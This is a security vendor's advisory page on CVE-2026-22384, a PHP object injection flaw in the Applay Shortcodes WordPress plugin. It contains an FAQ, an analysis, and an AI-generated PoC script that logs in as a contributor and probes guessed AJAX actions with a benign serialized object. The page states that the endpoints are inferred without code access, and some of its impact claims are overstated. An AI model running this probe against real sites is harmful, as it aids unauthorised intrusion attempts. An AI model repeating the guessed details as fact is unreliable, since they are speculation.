What is CVE-2026-22384?

CVE-2026-22384 is a high-severity vulnerability in the Applay – Shortcodes plugin for WordPress, affecting versions up to 3.7. It allows authenticated attackers with contributor-level access to exploit PHP Object Injection through the deserialization of untrusted input.

How does this vulnerability work?

The vulnerability arises from the insecure deserialization of user-controlled input, allowing attackers to submit malicious serialized data to a plugin endpoint. If a suitable PHP Object Injection (POP) chain is present, this could lead to arbitrary code execution or data exposure.

Who is affected by this vulnerability?

Any WordPress site using the Applay – Shortcodes plugin version 3.7 or earlier is at risk, particularly if it allows contributor-level users or higher to access and exploit the vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Applay – Shortcodes plugin installed. If it is version 3.7 or earlier, your site is susceptible to CVE-2026-22384.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability poses a significant risk. This means that successful exploitation could lead to severe consequences, such as unauthorized access or data loss.

What steps can I take to mitigate this vulnerability?

To mitigate this vulnerability, update the Applay – Shortcodes plugin to the latest version. Additionally, implement input validation and replace the use of unserialize() with safer alternatives, such as JSON parsing.

What are the risks if this vulnerability is exploited?

If exploited, this vulnerability can allow authenticated attackers to inject arbitrary PHP objects, potentially leading to remote code execution, file deletion, or exposure of sensitive data. The presence of a suitable POP chain could significantly increase the impact.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted serialized object payload to a plugin endpoint. It highlights the process of submitting malicious data and the need for a viable POP chain for successful exploitation.

What is a PHP Object Injection (POP) chain?

A PHP Object Injection (POP) chain is a series of objects that, when injected, can be manipulated to execute arbitrary code or perform unintended actions within the application. The presence of a POP chain is crucial for exploiting vulnerabilities like CVE-2026-22384.

What should developers do to prevent similar vulnerabilities?

Developers should avoid using unserialize() with untrusted input, implement strict type checking, and use safe data serialization formats like JSON. Regular security audits and adherence to WordPress security best practices are also essential.

Is there a known exploit for this vulnerability?

As of now, there is no known public exploit for CVE-2026-22384. However, the potential for exploitation exists, especially if a suitable POP chain is available through other plugins or themes.

How can I stay updated on vulnerabilities like this one?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow reputable security blogs, and monitor the National Vulnerability Database (NVD) or the CVE database for updates related to WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-22384: Applay – Shortcodes <= 3.7 – Authenticated (Contributor+) PHP Object Injection (applay-shortcodes)

CVE ID CVE-2026-22384

Plugin applay-shortcodes

Severity High (CVSS 7.5)

CWE 502

Vulnerable Version 3.7

Patched Version —

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22384 (metadata-based):
The Applay – Shortcodes WordPress plugin version 3.7 contains an authenticated PHP object injection vulnerability. Contributor-level or higher authenticated attackers can exploit this by submitting malicious serialized data to a plugin endpoint. The CVSS 7.5 score reflects high impact potential when combined with a suitable POP chain.

Atomic Edge research identifies the root cause as insecure deserialization of user-controlled input. The plugin likely passes unsanitized POST or GET parameter data directly to PHP’s unserialize() function. This inference comes from the CWE-502 classification and the vulnerability description. Without code access, Atomic Edge cannot confirm the exact vulnerable function or endpoint, but WordPress plugin architecture suggests the vulnerability exists within an AJAX handler, shortcode processing function, or admin panel submission handler.

Exploitation requires contributor-level WordPress credentials. Attackers would send a crafted serialized object payload to a specific plugin endpoint. The most probable attack vector is the WordPress AJAX handler (/wp-admin/admin-ajax.php) with an action parameter containing the plugin prefix. Alternative vectors include REST API endpoints or direct plugin file access. The payload would contain serialized PHP objects targeting available POP chains in the environment.

Remediation requires replacing unserialize() with safe alternatives. Developers should implement strict type checking, use JSON parsing for data interchange, or employ PHP’s allowed_classes option with unserialize(). Input validation must occur before deserialization. WordPress security best practices mandate capability checks and nonce verification for all authenticated endpoints.

Successful exploitation enables arbitrary object injection into the application context. With a suitable POP chain present in the environment, attackers achieve remote code execution, file deletion, or sensitive data exposure. The absence of a known POP chain in the plugin limits immediate exploitation but creates a persistent backdoor when combined with other plugins or themes. This vulnerability represents a critical privilege escalation vector from contributor to administrator capabilities.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-22384 - Applay - Shortcodes <= 3.7 - Authenticated (Contributor+) PHP Object Injection
<?php
/**
 * Proof of Concept for CVE-2026-22384
 * This script demonstrates authenticated PHP object injection in the Applay Shortcodes plugin.
 * Assumptions based on WordPress plugin patterns:
 * 1. Vulnerability exists in an AJAX endpoint
 * 2. The AJAX action contains 'applay' or 'shortcodes' prefix
 * 3. A serialized parameter is passed via POST
 * 4. Contributor-level authentication is required
 *
 * WARNING: This PoC uses a benign serialized object for demonstration.
 * Actual exploitation requires a viable POP chain.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'contributor_user';
$password = 'contributor_pass';

// Construct a benign serialized object for testing
// In real exploitation, this would contain a malicious POP chain
$serialized_payload = serialize(new stdClass());
$serialized_payload = 'O:8:"stdClass":0:{}';

// WordPress authentication via wp-login.php
function wordpress_login($site_url, $username, $password) {
    $login_url = $site_url . '/wp-login.php';
    $admin_url = $site_url . '/wp-admin/';
    
    // Initial GET to retrieve login form and cookies
    $ch = curl_init($login_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR => '/tmp/cookies.txt',
        CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false
    ]);
    $response = curl_exec($ch);
    
    // Extract nonce from login form (simplified)
    preg_match('/name="log"[^>]*>/', $response, $matches);
    
    // POST login credentials
    $post_fields = http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ]);
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $login_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $post_fields,
        CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Verify login by checking for admin bar in response
    return strpos($response, 'id="wpadminbar"') !== false;
}

// Test potential AJAX endpoints based on plugin naming patterns
$potential_actions = [
    'applay_shortcodes_action',
    'applay_process',
    'shortcodes_applay',
    'applay_ajax',
    'applay_save',
    'applay_update'
];

// Perform login
if (!wordpress_login($target_url, $username, $password)) {
    die("Login failed. Check credentials.");
}

// Test each potential endpoint
foreach ($potential_actions as $action) {
    $ch = curl_init($target_url);
    $post_data = http_build_query([
        'action' => $action,
        'data' => $serialized_payload,  // Most likely parameter name
        'payload' => $serialized_payload,
        'input' => $serialized_payload,
        'serialized' => $serialized_payload
    ]);
    
    curl_setopt_array($ch, [
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $post_data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
        CURLOPT_COOKIEJAR => '/tmp/cookies.txt',
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "Testing action: $actionn";
    echo "HTTP Code: $http_coden";
    echo "Response length: " . strlen($response) . "nn";
    
    // Look for error messages indicating deserialization attempts
    if (strpos($response, 'unserialize') !== false || 
        strpos($response, 'Object') !== false ||
        preg_match('/O:d+:"[^"]+"/', $response)) {
        echo "Potential deserialization detected for action: $actionn";
    }
}

echo "PoC completed. Review responses for deserialization indicators.n";
echo "Note: Actual exploitation requires a viable POP chain payload.n";
?>

Frequently Asked Questions

What is CVE-2026-22384?
Understanding the vulnerability
CVE-2026-22384 is a high-severity vulnerability in the Applay – Shortcodes plugin for WordPress, affecting versions up to 3.7. It allows authenticated attackers with contributor-level access to exploit PHP Object Injection through the deserialization of untrusted input.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the insecure deserialization of user-controlled input, allowing attackers to submit malicious serialized data to a plugin endpoint. If a suitable PHP Object Injection (POP) chain is present, this could lead to arbitrary code execution or data exposure.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Applay – Shortcodes plugin version 3.7 or earlier is at risk, particularly if it allows contributor-level users or higher to access and exploit the vulnerability.
How can I check if my site is vulnerable?
Assessing your plugin version
To determine if your site is vulnerable, check the version of the Applay – Shortcodes plugin installed. If it is version 3.7 or earlier, your site is susceptible to CVE-2026-22384.
What does a CVSS score of 7.5 indicate?
Understanding severity ratings
A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability poses a significant risk. This means that successful exploitation could lead to severe consequences, such as unauthorized access or data loss.
What steps can I take to mitigate this vulnerability?
Recommended actions for administrators
To mitigate this vulnerability, update the Applay – Shortcodes plugin to the latest version. Additionally, implement input validation and replace the use of unserialize() with safer alternatives, such as JSON parsing.
What are the risks if this vulnerability is exploited?
Potential consequences of exploitation
If exploited, this vulnerability can allow authenticated attackers to inject arbitrary PHP objects, potentially leading to remote code execution, file deletion, or exposure of sensitive data. The presence of a suitable POP chain could significantly increase the impact.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted serialized object payload to a plugin endpoint. It highlights the process of submitting malicious data and the need for a viable POP chain for successful exploitation.
What is a PHP Object Injection (POP) chain?
Defining the concept
A PHP Object Injection (POP) chain is a series of objects that, when injected, can be manipulated to execute arbitrary code or perform unintended actions within the application. The presence of a POP chain is crucial for exploiting vulnerabilities like CVE-2026-22384.
What should developers do to prevent similar vulnerabilities?
Best practices for secure coding
Developers should avoid using unserialize() with untrusted input, implement strict type checking, and use safe data serialization formats like JSON. Regular security audits and adherence to WordPress security best practices are also essential.
Is there a known exploit for this vulnerability?
Current state of exploitation
As of now, there is no known public exploit for CVE-2026-22384. However, the potential for exploitation exists, especially if a suitable POP chain is available through other plugins or themes.
How can I stay updated on vulnerabilities like this one?
Staying informed about security issues
To stay informed about vulnerabilities, subscribe to security mailing lists, follow reputable security blogs, and monitor the National Vulnerability Database (NVD) or the CVE database for updates related to WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations